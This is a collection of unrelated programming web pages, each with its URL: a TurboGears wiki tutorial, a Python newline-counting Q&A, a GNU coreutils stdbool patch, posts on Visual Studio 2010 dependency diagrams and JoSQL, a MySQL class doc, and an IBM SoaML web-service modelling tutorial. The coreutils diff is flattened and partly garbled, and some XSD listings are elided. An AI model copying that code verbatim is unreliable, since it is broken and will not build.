That's a lot of changes! Let's break it down. The first few changes are imports. We first pull in the turbogears package, which we'll make use of later. Next we pull in the Page from our model into our controller. The last change is our wiki parser. What? You didn't think we were going to write a structured text parser, did you? The Python community has a wide range of useful modules outside of TurboGears and there is no sense in not making use of them. As for the rest, the changes are:

- The expose decorator now points at our new template, using a dotted path and dropping the .html extension. (line 1)
- We add a pagename parameter to our method with a default pagename of "FrontPage" (line 2)
- We look up the page, using pagename as the primary key. Convenient, eh? (line 3)
- We format the page's data as HTML (line 4)
- We return a dictionary with page and data items. Notice the keys correspond to the variable names in our template. (line 5)

All that in six, very readable lines. The dictionary that we're returning at the end provides the data that populates the template and will be reused for other, more exotic purposes a bit later. The code is in place... Point your browser to http://localhost:8080/ and let's see what we've got! Oh, we've got an error. Since we're in development mode, CherryPy gives us the whole traceback, which is very convenient.
The traceback is telling us that we got an exception:

AttributeError: 'NoneType' object has no attribute 'data'

D'oh! We forgot to put a page in the database! Let's do something about that.
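One way to seed that first page - an assumption based on the model above, not a step spelled out in this excerpt - is from the interactive shell that ships with TurboGears (tg-admin shell), constructing a Page and flushing the session:

```python
# Run inside "tg-admin shell", which loads your project's environment.
# Page comes from the model defined earlier; session is the SQLAlchemy
# session that TurboGears manages.
from wiki20.model import Page
from turbogears.database import session

page = Page(pagename="FrontPage", data="Welcome to the 20 Minute Wiki!")
session.flush()  # write the new row to the page table
```

After that, reloading the page in the browser should find a FrontPage row instead of None.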
http://www.turbogears.org/1.5/docs/Wiki20/Page2.html
So I have an assignment that involves creating a tail to find the last K lines in a file. We have been given a buffer to use for this. For now I'm trying to write small things and search for "\n" characters within a file. I am running into a few problems. In python my code spits back 6 and in python3 it's a 0. The text file has WAY more than this though. Can someone please tell me why this isn't working as I would like?

def new():
    try:
        f = open("test.txt", "r")
        count = 0
        for i in f:
            if i == "\n":
                count = count + 1
        return count
        f.close()
    except(FileNotFoundError):
        print("No file")

for i in f: isn't doing what you think it is. The default iterator for a file gives you lines, not characters. So you're saying "Does the entire line equal just a return?" Try instead doing if i[-1] == "\n": as this says "Is the last character in the line a newline?" You might notice that this is trivially true, as each "line" is ended by a newline, so simply counting the lines is sufficient. If you want to iterate through the individual characters, I would do:

for line in file:
    for char in line:
        dostuff()

Naming the variables what you think they are will also help to troubleshoot if they end up not being what you thought.
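A self-contained sketch of the character-by-character approach the answer describes, using io.StringIO in place of a real file so it runs without test.txt:

```python
import io

def count_newlines(f):
    # A file's default iterator yields whole lines, so walk each line's
    # characters and count the "\n" terminators individually.
    count = 0
    for line in f:
        for char in line:
            if char == "\n":
                count += 1
    return count

# io.StringIO stands in for open("test.txt") here; the text has two
# line endings plus one blank line, so three newlines in total.
sample = io.StringIO("first\n\nthird\n")
print(count_newlines(sample))  # 3
```

The asker's original `if i == "\n"` only matches lines that are entirely a newline, i.e. blank lines, which explains the surprisingly low counts.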
https://codedump.io/share/S73UwT8jhDwA/1/finding-new-line-characters-in-a-text-file
"Peter O'Gorman" <address@hidden> writes: > In sort.c's check function there is a variable named nonunique, which is > declared as type bool. The code later does a compare: > if (<bool,true> <= (int)-1) error > xlc decided that the comparison was true. The solution is to declare > nonunique as an int type. I've looked into the bool problem some more, and have found the following trouble reports with respect to the way gnulib currently handles _Bool and <stdbool.h>: Some HP-UX C compilers mishandle _Bool (internal compiler error), independently of whether <stdbool.h> works. E.g., <>, <>. IBM C compiler mishandles sign-extension when combining _Bool with int. E.g., <>. I installed this patch into coreutils in an attempt to work around all these problems. I'll also suggest a similar patch to gnulib. 2005-11-25 Paul Eggert <address@hidden> * lib/Makefile.am (stdbool.h): Just copy stdbool_.h; no need to sed any more. * lib/stdbool_.h: Simplify greatly, under the assumption that these days most people use C99-compatible compilers to debug, so it's not worth worrying about catering to older compilers for that. This works around some porting problems with HP-UX compilers. (false, true) [defined __BEOS__]: Don't #undef; no longer needed. (_Bool): typedef to bool if C++ or BeOS, and #define to signed char otherwise. * m4/stdbool.m4 (AM_STDBOOL_H): Don't bother substituting HAVE__BOOL; no longer needed. (gl_STDBOOL_H): New macro, from gnulib. (AC_HEADER_STDBOOL): Sync with gnulib. 
Index: lib/Makefile.am =================================================================== RCS file: /fetish/cu/lib/Makefile.am,v retrieving revision 1.236 retrieving revision 1.239 diff -p -u -r1.236 -r1.239 --- lib/Makefile.am 24 Nov 2005 06:48:55 -0000 1.236 +++ lib/Makefile.am 26 Nov 2005 06:58:34 -0000 1.239 @@ -123,11 +123,11 @@ CLEANFILES += charset.alias ref-add.sed BUILT_SOURCES += $(STDBOOL_H) EXTRA_DIST += stdbool_.h -MOSTLYCLEANFILES += stdbool.h stdbool.ht +MOSTLYCLEANFILES += stdbool.h stdbool.h-t # Create stdbool.h on systems that lack a working one. stdbool.h: stdbool_.h - sed -e 's/@''HAVE__BOOL''@/$(HAVE__BOOL)/g' $(srcdir)/stdbool_.h > address@hidden - mv address@hidden $@ + cp $(srcdir)/stdbool_.h address@hidden + mv address@hidden $@ BUILT_SOURCES += $(ALLOCA_H) EXTRA_DIST += alloca_.h Index: lib/stdbool_.h =================================================================== RCS file: /fetish/cu/lib/stdbool_.h,v retrieving revision 1.5 retrieving revision 1.6 diff -p -u -r1.5 -r1.6 --- lib/stdbool_.h 14 May 2005 07:58:07 -0000 1.5 +++ lib/stdbool_.h 26 Nov 2005 06:37:31 -0000 1.6 @@ -1,4 +1,4 @@ -/* Copyright (C) 2001, 2002, 2003 Free Software Foundation, Inc. +/* Copyright (C) 2001, 2002, 2003, 2005 Free Software Foundation, Inc. Written by Bruno Haible <address@hidden>, 2001. This program is free software; you can redistribute it and/or modify @@ -54,35 +54,45 @@ /* 7.16. Boolean type and values */ /* BeOS <sys/socket.h> already #defines false 0, true 1. We use the same - definitions below, but temporarily we have to #undef them. */ + definitions below, which is OK. */ +/* C++ and BeOS have a reliable _Bool. address@hidden@ -#__ typedef bool _Bool; +#else +# define _Bool signed char #endif + #define bool _Bool /* The other macros must be usable in preprocessor directives. 
*/ Index: m4/stdbool.m4 =================================================================== RCS file: /fetish/cu/m4/stdbool.m4,v retrieving revision 1.6 diff -p -u -r1.6 stdbool.m4 --- m4/stdbool.m4 7 Oct 2005 18:53:20 -0000 1.6 +++ m4/stdbool.m4 26 Nov 2005 07:00:33 -0000 @@ -11,7 +11,7 @@ AC_DEFUN([AM_STDBOOL_H], [ AC_REQUIRE([AC_HEADER_STDBOOL]) - # Define two additional variables used in the Makefile substitution. + # Define an additional variable used in the Makefile substitution. if test "$ac_cv_header_stdbool_h" = yes; then STDBOOL_H='' @@ -19,15 +19,11 @@ AC_DEFUN([AM_STDBOOL_H],. @@ -79,7 +75,7 @@ AC_DEFUN([AC_HEADER_STDBOOL], reject this program, as the initializer for xlcbug is not one of the forms that C requires support for. However, doing the test right would require a run-time - test, and that would make crosss-compilation harder. + test, and that would make cross-compilation harder. Let us hope that IBM fixes the xlc bug, and also adds support for this kind of constant expression. In the meantime, this test will reject xlc, which is OK, since @@ -87,10 +83,15 @@ AC_DEFUN([AC_HEADER_STDBOOL], char digs[] = "0123456789"; int xlcbug = 1 / (&(digs + 5)[-2 + (bool) 1] == &digs[4] ? 1 : -1); #endif + _Bool q = true; + _Bool *pq = &q; ], [ - return (!a + !b + !c + !d + !e + !f + !g + !h + !i + !j + !k + !l - + !m + !n + !o + !p); + ])])
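The xlc misbehavior Peter describes can be sketched in a few lines (names here are illustrative, not the actual sort.c code):

```c
#include <assert.h>
#include <stdbool.h>

/* With a conforming C99 _Bool, the value true promotes to int 1 before
   the comparison, so comparing it against -1 must be false.  The
   reported xlc behavior effectively sign-extended the bool, making the
   comparison come out true. */
int bool_le_minus_one(void)
{
    bool nonunique = true;
    return nonunique <= -1;  /* 0 (false) on a conforming compiler */
}
```

Defining _Bool as signed char, as the patch does for non-C++ compilers, keeps the promotion well defined (signed char 1 promotes to int 1), which sidesteps the broken native _Bool entirely.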
http://lists.gnu.org/archive/html/bug-coreutils/2005-11/msg00268.html
Visual Studio 2010: Visualizing dependencies

Visual Studio 2010 introduces a new and cool feature – architecture diagrams that visualize dependencies between assemblies, namespaces and classes. In this posting I will show you what these diagrams look like and provide some explanations about how to read them.

I tested architecture diagrams (or should I say dependency diagrams?) with one of my small projects. Okay, I tried to visualize dependencies found in the source code of KiGG too, but it was too big for the current implementation of the dependency visualizer. For smaller projects it works pretty well. You can find these diagrams in the Architecture menu of Visual Studio 2010.

Assembly dependencies

As a first thing I generated a dependency diagram for assemblies. There is one main dll and it is related to the violet block labeled Generics. The blue block is my assembly and the generics block shows all the generics I am using. The Externals block is for external assemblies, and on the following screenshot it is expanded so you can see the other assemblies that my own assembly depends on.

Visual Studio 2010: Assembly dependencies diagram. Click on image to view it at original size.

Namespace dependencies

The namespace dependencies diagram illustrates dependencies between namespaces. Here you can also see the Generics and Externals boxes; their purpose is the same as before. On the following screenshot you can see class dependencies in my project. The Bookmarks2LiveWriter box is expanded and it contains the classes in this namespace. The class ExceptionBox is also expanded and you can see how method dependencies are visualized.

Visual Studio 2010: Namespace dependencies diagram. Click on image to view it at original size.

Class dependencies

The class dependencies diagram illustrates dependencies between classes. As on the previous diagrams, you can see lines of different thickness between classes. The thickness of a line gives you some idea about how dependent one class is on another.
A thicker line means a heavier dependency. The direction of a line shows which class is using which other class.

Visual Studio 2010: class dependencies diagram. Click on image to view it at original size.

Custom dependencies

You can also generate custom dependency diagrams that illustrate things just like you want. The result is something like you can see on the screenshots above. The only new thing is the dialog that lets you specify what you can see on the diagram. You can see this dialog on the right, and if it is too small for you then please click on it to see it at original size. The right area in this dialog is reserved for an example diagram. If you change the state of the check boxes, you can see on the example what the generated diagram will look like. After clicking OK, the custom architecture diagram will be generated.

Matrix View

It is possible to view dependencies also as a matrix. You can see the dependencies matrix on the following screenshot. You can see that I have disabled some options in the legend – otherwise the matrix would be very large.

Visual Studio 2010: Matrix view of dependencies. Click on image to view it at original size.

Conclusion

Dependency diagrams are very useful tools when you analyze dependencies between different components in your system. Fewer dependencies usually mean fewer problems, because changing one part of the system causes fewer changes to other parts of the system. I think these diagrams are a good addition to code analysis reports, because sometimes one picture can tell more than 1000 words.

Currently dependency diagrams are generated pretty slowly, but I hope it will be much faster when the first stable version of Visual Studio 2010 hits the streets. Currently you can save diagrams as XPS files, and it is also possible to copy a diagram or legend to the clipboard as an image. It is pretty easy to take those diagrams and make them part of your project documents.
http://weblogs.asp.net/gunnarpeipman/visual-studio-2010-visualizing-dependencies
RAII based class to acquire and release schema meta data locks.

#include <dd_schema.h>

When an instance of this class is created, and 'ensure_lock()' is called, it will acquire an IX lock on the submitted schema name, unless we already have one. When the instance goes out of scope or is deleted, the ticket registered will be released.

The destructor releases the MDL ticket, if any, when the instance of this class leaves scope or is deleted.

ensure_lock() makes sure we have an IX meta data lock on the schema name. If the circumstances indicate that we need a meta data lock, and we do not already have one, then an IX meta data lock is acquired.
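The idiom the class follows - acquire on construction only if not already held, release on destruction - can be sketched generically. All names below are hypothetical illustrations of the RAII pattern, not the actual MySQL internals:

```cpp
#include <cassert>
#include <set>
#include <string>

// Stand-in for the server's MDL subsystem: just remembers held names.
class LockRegistry {
public:
    bool held(const std::string& name) const { return locks_.count(name) != 0; }
    void acquire(const std::string& name) { locks_.insert(name); }
    void release(const std::string& name) { locks_.erase(name); }
private:
    std::set<std::string> locks_;
};

class ScopedSchemaLock {
public:
    ScopedSchemaLock(LockRegistry& reg, const std::string& schema)
        : reg_(reg), schema_(schema), owned_(!reg.held(schema)) {
        // Acquire only if the lock is not already held, mirroring the
        // "unless we already have one" behavior described above.
        if (owned_) reg_.acquire(schema_);
    }
    ~ScopedSchemaLock() {
        if (owned_) reg_.release(schema_);  // release only what we acquired
    }
    ScopedSchemaLock(const ScopedSchemaLock&) = delete;
    ScopedSchemaLock& operator=(const ScopedSchemaLock&) = delete;
private:
    LockRegistry& reg_;
    std::string schema_;
    bool owned_;
};
```

Because release happens in the destructor, the lock is dropped on every exit path from the scope, including early returns and exceptions.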
https://dev.mysql.com/doc/dev/mysql-server/latest/classdd_1_1Schema__MDL__locker.html
JoSQL is like that. But before we get into why, there's one thing that should be cleared up. Despite the name, JoSQL isn't a database server, or a toolkit for database access via JDBC, or anything like that. It's an engine that gives you access to your in-memory objects using SQL. Now, while that doesn't have the mass market appeal of blogs, to a developer it is such an amazingly useful tool that after using it, you'll wonder how high-level computing languages such as C# or Java have been around so long without this facility. To recap: It's an engine that allows you to use SQL syntax to access your in-memory objects, so you could, for example, do something like this:

SELECT * from com.devx.mywidgets WHERE text='hello'

Think about how useful this can be to your applications. What if you want to skin an application by setting the color property of all your labels to one color and your panels to another color? You can run a query, pull your labels, set their color, run another query, pull your panels, and set their color. Very simple. Alternatively, how about an application that has a number of objects in memory that represent connected clients, such as what you might find in a chat server? To perform a function such as, 'Find all clients on my server that are administrators and send them the message x,' you would have to iterate through each client, check its permissioning bits, and if they match the administrative patterns, you send them the message. JoSQL may not be more efficient than this, but it does make your code a lot cleaner. In the following sections I'll walk you through some examples showing how it works and how it can be used in such a scenario.

Getting Started with JoSQL

JoSQL is an open source project that may be downloaded here. At this site, you'll also find some documentation and examples of how to use it.
I found these examples to be a little too light and too high level, leaving you with a lot of figuring left to do (albeit with the aid of the excellent JavaDocs). Despite this, if you use a good IDE that has auto-complete then you can generally figure out a lot of the API for yourself. To get started, download the JoSQL package and copy the JARS to a library directory. There are two JARs that you need: the JoSQL one (presently called JoSQL1-1.jar) and a third-party dependency called gentlyWeb utilities (gentlyWEB-utils-1.1.jar). Then, from your Java code, add an import to reference JoSQL like this:

import org.josql.*;
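From there, a query can be sketched roughly as follows. This is a hedged illustration of the general parse-then-execute pattern described in the JoSQL documentation; the MyWidget class and its text property are hypothetical, and the exact method names should be checked against the JavaDocs:

```java
import java.util.List;
import org.josql.Query;
import org.josql.QueryResults;

public class WidgetSearch {
    // widgets is a list of hypothetical MyWidget objects with a text property.
    public static List findHello(List widgets) throws Exception {
        Query q = new Query();
        q.parse("SELECT * FROM com.devx.mywidgets.MyWidget WHERE text = 'hello'");
        QueryResults results = q.execute(widgets);  // run the query over the list
        return results.getResults();                // matching objects
    }
}
```

The SQL is parsed once and can then be executed against any list of objects of the named class, which is what makes the chat-server scenario above so clean.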
http://www.devx.com/dbzone/Article/30291
What this article covers Service-oriented architecture (SOA) is about provided and used services. Service providers and consumers are commonly called participants. A service provider publishes descriptions of services and provides the implementation of the services. Service consumers depend on the descriptions to build service clients to invoke and consume the services. Therefore, designing the services in a proper way is important and of a high priority to the success of any SOA project. There are three main values provided by modeling web services with UML: - The first value is to abstract away any unnecessary details, such as the syntax of the Web Services Description Language (WSDL) and XML Schema Definition (XSD) and focus on the main structures of the web services, including data types in the XML schema, the operations in the web service interface, and the binding of that interface to a protocol and end point. - The second value is to provide a standard way, which is a UML model, to communicate the design of the web service to both the business stakeholders and the technical team in the SOA project. Communicating the design of the web service through WSDL and XSD files to business stakeholders is not easy, especially when the number of the web services increases. - The third value is to better manage and easily express the relationship between web services WSDL and XSD, such as in the composite services that combine two or more services. These three values will be illustrated in the example presented in the article. The idea of having a modeling language for describing services has been realized since introducing the Software Services Unified Modeling Language (UML) 2.0 profile. This profile is deprecated now and replaced by Service-Oriented Architecture Modeling Language (SoaML) UML profile. It is an Object Management Group (OMG) standard that describes a UML profile and metamodel for the specification and design of services within the SOA. 
That profile is used in this article to design the web service interface (WSDL). The other profile used in this article is the XSD transformation UML profile, which provides stereotypes and properties for UML constructs to be generated into XML schema components. SoaML has been supported in IBM® Rational® Software Architect for WebSphere® Software since Version 7.5.4. The example in this article is developed with Version 7.5.5. This software provides a rich set of tools and model templates for designing services artifacts using SoaML. This article shows the main steps to design a web service, along with its XML message schema, using XSD and SoaML transformation profiles: - Common schema definition design - XML schema definition design - Service specification or service interface definition design - Service binding design - Transformation configuration - Model transformation into WSDL and XSD. First, we'll introduce the example that is used to explain and apply the idea in the article. Government SOA example in this article A government wants to employ a government service bus that publishes services provided by some governmental agencies. These services are available to be consumed by other governmental agencies. Figure 1 shows a diagram for the example. Figure 1. Government SOA example The government has a common schema that is shared by all governmental agencies. Each government agency could be a provider of a service and a consumer of another service. Generic names are used in the example to avoid any accidental similarities with real names. Each governmental agency provides one service and has one XML schema. For simplicity, the example will cover creating one service with its XML schemas and a common schema, as well. We will start with building an empty structure of the project. We assume that the agency has a subsystem on which the web service will be built. The web service is assumed to expose one functionality of this subsystem. 
Normally, each web service should have three artifacts:
- XML schema or XSD
- Specification or interface definition
- Service or binding
This is why the folder structure that we are going to build shortly reflects that. The following steps show how to create the UML project that will be used throughout this article:
- Create a UML Project with this name: soaml_example. Other than the following settings, just keep the default values of the wizard:
- In the Create Model tab, make sure to select General in the Categories pane and Blank Package in the Templates pane, and then write gov_agency1_serviceModel in the file name field to create a model for Government Agency Service Provider 1.
- In the Package Detail tab, select Model in the Package Type frame and uncheck Create a default diagram in the new package in the Default Diagram frame.
- In the Model Capabilities tab, check Customize UI and select Modeling, UML Diagram Building Blocks, UML Element Building Blocks, and XSD Transformation Profile, and then click Finish.
- Apply SoaML and XSD Transformation UML profiles to the model by following these steps:
- Click the gov_agency1_serviceModel model.
- In the Properties view, click the Profiles tab.
- Click Add Profile, and then, from the Deployed Profile drop-down menu, select SoaML.
- Repeat the previous step to add the XSD Transformation profile. The Properties view of the model will look like Figure 2.
Figure 2. Properties view of the model in Rational Software Architect
- Create a package called govSrvProvider1.gov by right-clicking on the model and selecting Add UML > Package.
- Then, delete the freeform diagram that is created by default.
- Under this package, create another package called subSystem1. Under that package, create three packages: services, specifications, and xml.
- Then delete the freeform diagrams that are created with the packages by default.
- Create these packages:
- Under the services package, create a package called v1_0.
- Under the specifications package, create a package called v1_0.
- Under the xml package, create a package called schemas.
- Under the schemas package, create a package called v1_0, and then delete the freeform diagram that is created with the schemas package by default.
- Apply the schema stereotype to all of the packages named v1_0 that you created in the previous step by following these steps:
- Click the package v1_0.
- Click the Stereotypes tab in the Properties view.
- Click Apply Stereotypes, and then select schema from the list.
- Import XSD primitive Data Types to the model (these primitive data types can be used to use primitive types, such as string, int, and float, in the schema):
- Right-click on the gov_agency1_serviceModel model, and select UML Properties.
- Select ElementImport from the left frame and click the arrow button in the right frame.
- In the Search field, write XSD and select «modelLibrary» XSDDataTypes – XSDDataTypes.
The project will then look like Figure 3.
Figure 3. Project after creating model and packages for the government provider
- Create another model, gov_commonSchema.
- Under this model, create the packages government.gov > commonTypes > xml > schemas > v1_0 and delete all the freeform diagrams that are created with these packages by default, except the one that is with the package v1_0.
- Repeat steps 6 and 7 for the package v1_0 and the model gov_commonSchema.
The project will look like the following figure.
Figure 4. Project after creating model and packages for all government agencies
In a real environment, for better model management and governance, the common schema should have been created in a separate project. However, for simplicity, we have everything in one project in this example.
Tips: Creating the folder structure in a way that separates the data model, service specification, and service binding is a best practice from both source control management and development perspectives. Also, having the version number, v1_0, as part of the folder structure and namespace (as it will be shown shortly) is a governance best practice.

XML schema definition design

Messages are passing between web service providers and consumers. Messages consist of elements that have data types. These data types are defined in a schema. Before we go through the example, we will explain briefly how to create the main structures of any schema. For more information about this, see the XML schema transformation profile links in Resources. These structures are simple and complex data types. The XSD transformation profile will be used to transform the UML structures into the schema definition.

Simple data type

Applying the «SimpleType» stereotype to a UML class results in an XML schema simple type definition. Restriction of any simple type to a primitive XSD data type is possible by applying the «restriction» stereotype to a UML generalization relationship. You can manipulate any of the restriction properties of the XSD simple type in the XSD SimpleType tab of the Properties view. Primitive data types were imported into the model in the previous steps of creating the project and model. As an example of manipulating the properties of a simple data type, in the EmailAddressType simple type, the pattern value is set to this, as shown in the figure that follows:

[0-9A-Za-z'\.\-_]{1,127}@[0-9A-Za-z'\.\-_]{1,127}

Figure 5. XSD simple type in UML

When transformed into XSD, that figure looks like the code in Listing 1.

Listing 1. XSD simple type in XML

<xsd:simpleType name="EmailAddressType">
  <xsd:restriction base="xsd:string">
    <xsd:pattern value="[0-9A-Za-z'\.\-_]{1,127}@[0-9A-Za-z'\.\-_]{1,127}"/>
  </xsd:restriction>
</xsd:simpleType>

Enumeration

Enumeration is a special type of the simple type. It is needed when there should be a specific list of constant values to be used for the simple type defined by the enumeration. A common example of enumeration for gender is shown in the following figure.

Figure 6.
Also, having the version number, v1_0, as part of the folder structure and namespace (as will be shown shortly) is a governance best practice.

XML schema definition design

Messages pass between web service providers and consumers. Messages consist of elements that have data types. These data types are defined in a schema. Before we go through the example, we will explain briefly how to create the main structures of any schema. For more information about this, see the XML schema transformation profile links in Resources. These structures are simple and complex data types. The XSD transformation profile will be used to transform the UML structures into the schema definition.

Simple data type

Applying the «SimpleType» stereotype to a UML class results in an XML schema simple type definition. Restriction of any simple type to a primitive XSD data type is possible by applying the «restriction» stereotype to a UML generalization relationship. You can manipulate any of the restriction properties of the XSD simple type in the XSD SimpleType tab of the Properties view. Primitive data types were imported into the model in the previous steps of creating the project and model. As an example of manipulating the properties of a simple data type, in the EmailAddressType simple type, the pattern value is set to this, as shown in the figure that follows:

[0-9A-Za-z'\.\-_]{1,127}@[0-9A-Za-z'\.\-_]{1,127}

Figure 5. XSD simple type in UML

When transformed into XSD, that figure looks like the code in Listing 1.

Listing 1. XSD simple type in XML

<xsd:simpleType name="EmailAddressType">
    <xsd:restriction base="xsd:string">
        <xsd:pattern value="[0-9A-Za-z'\.\-_]{1,127}@[0-9A-Za-z'\.\-_]{1,127}"/>
    </xsd:restriction>
</xsd:simpleType>

Enumeration

Enumeration is a special kind of simple type. It is needed when there should be a specific list of constant values to be used for the simple type defined by the enumeration. A common example of enumeration for gender is shown in the following figure.

Figure 6. XSD enumeration in UML

When transformed into XSD, that looks like the following code.

Listing 2. XSD enumeration in XML

<xsd:simpleType name="...">
    <xsd:restriction base="xsd:string">
        <xsd:enumeration value="..."/>
        <xsd:enumeration value="..."/>
    </xsd:restriction>
</xsd:simpleType>

Complex data type

To create a complex type, a «complexType» stereotype must be applied to a UML class (see the next figure). The properties of the complex type can be manipulated in the XSD Complex Type tab of the Properties view. You can add elements to the complex type by adding attributes with the «element» stereotype to the UML class. These attributes are either typed directly by primitive XSD data types or associated with other types defined in user-specific schemas.

Note: The minOccurs attribute of any element can be specified by setting the Multiplicity of the attribute.

Figure 7. XSD complex type in UML

Listing 3 shows this model in XSD.

Listing 3. XSD complex type in XML

<xsd:complexType name="...">
    <xsd:sequence>
        <xsd:element name="..." type="..."/>
        <xsd:element name="..." type="..."/>
        <xsd:element name="..." type="..."/>
        <xsd:element name="..." type="..."/>
    </xsd:sequence>
</xsd:complexType>

Common schema definition

The common schema defines the XSD data types that are shared between all participants in the SOA project, that is, all other government agencies in this example. The common schema has one major advantage: all common data types are defined away from any specific service provider. This allows for more control and governance over these common types and minimizes the interdependencies between the service providers' schemas. However, the common schema has one major disadvantage: any update to the common schema requires synchronization with all service participants that depend on it.

Creating the schema in UML is just a matter of creating a class diagram and applying the appropriate stereotypes, as explained before. The following figure depicts the common schema in the example presented in this article.

Figure 8. XSD common schema example

Note: The whole set of schema properties is available in the XSD Schema tab in the Properties view.
In the example, only three of the properties have been set, as the following figure shows.

Figure 9. XSD schema properties

To change these properties, under the gov_commonSchema model, select the schema v1_0 under government.gov > commonTypes > xml > schemas, and set the following properties in the XSD Schema tab in the Properties view:

- Element from Default to qualified
- Target Namespace to urn:government.gov/commonTypes/xml/schemas/v1_0/
- Target Namespace Prefix to govxsd

Tips: It is a good practice to have the Target Namespace follow the same package structure as your schema. Also, documentation can be added to the schema, or to any data type or element in the schema, through the Documentation tab in the Properties view.

The schema model in the project structure will look like the following screen capture.

Figure 10. Common schema model view in the Project Explorer

Web service XML schema definition design

Now it is time to start working on the web service artifacts. Normally, this activity starts with creating the web service schema definition, then creating the web service WSDL definition (the web service interface), and, finally, creating the web service WSDL binding. The web service presented in our example, which is provided by Government Agency Service Provider 1, is about getting the birth certificate of a person. The schema of this service is depicted in the following figure.

Figure 11. XSD schema of Government Agency 1 service example

Again, creating the schema in UML is just creating a class diagram and applying the appropriate stereotypes. As before with the common schema definition, you need to set three properties of the schema.
To change these properties, in the gov_agency1_serviceModel project, under govSrvProvider1.gov > subSystem1 > xml > schemas, click the v1_0 schema, and set these properties in the XSD Schema tab in the Properties view:

- Element from default to qualified
- Target Namespace to urn:govSrvProvider1.gov/subSystem1/xml/schemas/v1_0/
- Target Namespace Prefix to govprv1xsd

Web service specification design

Now it is time to build the WSDL interface definition of the web service. It is always best to separate the web service interface definition, which is the WSDL port type, from the web service WSDL binding. A binding defines message format and protocol details for the operations and messages defined by a particular WSDL port type. Besides the separation of concerns, keeping the WSDL port type and the WSDL binding in two documents allows for any number of bindings for a given port type.

The following steps show how to create a web service WSDL port type in UML:

- Under govSrvProvider1.gov > specifications > v1_0, open the Main freeform diagram.
- To add a web service interface, from the Service tray in the Palette, click Service Interface (simple) and click the diagram. Then name it BirthCertificateInfo.
- Add an operation to this interface as you would add any operation to a UML interface, and name it getBirthCertById.
- Create messages for the operation that you just created. The purpose of the messages is to wrap the input and output parameters of the operation in one request message and one response message.
  - From the Class tray in the Palette, click Stereotyped Class and click the diagram. Then select Create «MessageType» Class from the drop-down menu, and name it getBirthCertByIdRequest.
  - Repeat the previous step to create another message with the name getBirthCertByIdResponse.
- Add an attribute to getBirthCertByIdRequest and name it ID. Set its type to string and add the «element» stereotype to it.
- Add an attribute to getBirthCertByIdResponse, and name it birthcertificate. Set its type to BirthCertificate from the schema of the service, and add the «element» stereotype to it.
- Click the interface that you just created and open the Operations tab in the Properties view.
- Click the Owned Parameter button and, when a pop-up window opens, click the Insert New Parameter button three times to add three parameters.
  - The first parameter is the input parameter of the operation. Change its Name to Id, and set its Type to getBirthCertByIdRequest, which can be done by typing in the Search field. Tip: You might need to scroll right to set the properties of this parameter.
  - The second parameter is the output parameter of the operation. Change its Name to birthCert, set its Direction to Return, and set its Type to getBirthCertByIdResponse by typing in the Search field. Tip: You might need to scroll right to set the properties of this parameter.
  - The third parameter is the exception of the operation. Change its Name to fault, set its Direction to Return, set Is Exception to true, and then click Browse and select government.gov > commonTypes > xml > schemas > v1_0. Set the parameter Type to ExceptionType.
- Select govSrvProvider1.gov > xml > schemas, and then click the v1_0 schema to set the following properties in the XSD Schema tab in the Properties view:
  - Element from Default to qualified
  - Target Namespace to urn:govSrvProvider1.gov/subSystem1/specifications/v1_0/
  - Target Namespace Prefix to srvspc1xsd

The web service interface will then look like the following figure.

Figure 12. Web service WSDL interface UML example

The web service interface is now complete, so you can define any binding to that interface.

Web service binding design

Now it is time to specify a binding for the WSDL interface of the web service. The binding references the port type that it binds.
To add a binding in this example, follow these steps:

- Select govSrvProvider1.gov > services > v1_0, and open the Main freeform diagram.
- From the Service tray in the Palette, click Participant and then click the diagram. Name it BirthCertificateInfoService.
- In the Project Explorer, right-click «Participant» BirthCertificateInfoService and select Add Service Modeling > Service Point. Then click Select Existing Element, search for «ServiceInterface» BirthCertificateInfo, and select it. After that, name it BirthCertificateInfoPort.

The web service WSDL binding component will then look like the following figure.

Figure 13. Web service WSDL binding UML example

After the UML model for the web service is ready, it is time to transform this UML model into WSDL and XSD artifacts. To do that, you need to create a transformation configuration.

Transformation configuration

It is always best to have two different transformation configurations: one for WSDL and a second for XSD. This gives you better change management of the WSDL and the XSD separately. For example, most of the time there is a change in the schema, and then the XSD has to be updated without any change to the WSDL. So, for this example, you will create three transformation configuration files:

- One for UML to XSD for the common schema
- Another for UML to XSD for the government agency
- A last one for UML to WSDL for the government agency

UML-to-XSD transformation configuration

Start with the steps to create a UML-to-XSD transformation configuration for the common schema:

- Create a folder and name it WSDL by right-clicking on the project and selecting New > Folder. This folder will contain the WSDL and XSD files that will be generated.
- To create a transformation configuration, click Modeling > Transform > New Configuration in the menu. Name it gov_commonSchema_uml2xsdV1_0, and from the Service Oriented Architecture Transformations folder, select UML to XSD from the Transformation menu.
Then, click Next.

- On the Source and Target page, in the Selected source pane, select «schema» v1_0 from gov_commonSchema > government.gov > commonTypes > xml > schemas. Next, select the WSDL folder in the Selected target pane. Then click Finish. The gov_commonSchema_uml2xsdV1_0.tc file is created and opened.
- In the Main tab, under Merge options, select the Do not merge: Warn before overwriting any files option.
- In the Output Options tab, select v1_0 in the File Name column of the table. Then uncheck the Add suffix check box and, in the Add prefix field, write commonSchema, so the file name will be commonSchema_v1_0. Click the disk icon or press Ctrl+S to save the file.

Repeat the previous steps with the appropriate source and target to create a transformation configuration named gov_agency1Schema_uml2xsdV1_0.tc for the schema of the service of the government agency, with the schema file name govAgency_srvSchema_v1_0.

Service transformation configuration

Now, let us create a transformation configuration for the service itself:

- Click Modeling > Transform > New Configuration in the menu. Name the configuration gov_agencyPrv_Srv1_uml2wsdlV1_0 and, from the Service Oriented Architecture Transformations folder, select UML to WSDL from the Transformation menu. Then click Next.
- On the Source and Target page, in the Selected source pane, select «Participant» BirthCertificateInfoService from gov_agency1_serviceModel > govSrvProvider1.gov > subSystem1 > services > v1_0. Next, select the WSDL folder in the Selected target pane. Then click Finish. The gov_agencyPrv_Srv1_uml2wsdlV1_0.tc file is created and opened.
- In the Main tab, under Merge options, select Do not merge: Warn before overwriting any files.
- In the Output Options tab, do the following:
  - Select BirthCertificateInfoService in the File Name column of the table, uncheck the Add prefix check box, and in the Add suffix field, write _v1_0.
  - Select v1_0 in the File Name column of the table that corresponds to specifications. Then uncheck the Add suffix check box and, in the Add prefix field, write BirthCertificateInfo, so the file name will be BirthCertificateInfo_v1_0.
  - Select v1_0 in the File Name column of the table that corresponds to subsystem/xml/schema. Then uncheck the Add suffix check box and, in the Add prefix field, write govAgency_srvSchema, so the file name will be govAgency_srvSchema_v1_0.
